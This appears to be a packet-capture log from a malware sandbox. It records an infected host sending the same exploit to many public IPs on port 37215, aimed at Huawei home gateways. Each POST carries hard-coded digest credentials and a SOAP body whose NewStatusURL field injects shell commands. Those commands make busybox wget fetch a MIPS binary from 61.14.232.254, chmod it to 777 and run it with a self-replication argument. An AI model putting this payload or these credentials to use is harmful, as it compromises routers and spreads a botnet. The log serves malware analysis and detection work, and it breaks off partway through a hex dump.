                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  403192.168.2.135839453.41.225.1137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.276638985 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  404192.168.2.134244887.12.5.5237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.276648045 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  405192.168.2.134165425.243.233.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.276786089 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  406192.168.2.1338378197.51.134.17637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.276819944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  407192.168.2.1340098197.100.182.5537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.276845932 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  408192.168.2.133698841.252.108.16637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.277028084 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  409192.168.2.1352668157.185.150.15737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.277095079 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  410192.168.2.134758041.52.42.21937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.277107954 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  411192.168.2.1349140197.147.44.24337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.277127028 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  412192.168.2.1333400197.203.190.17937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.277144909 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 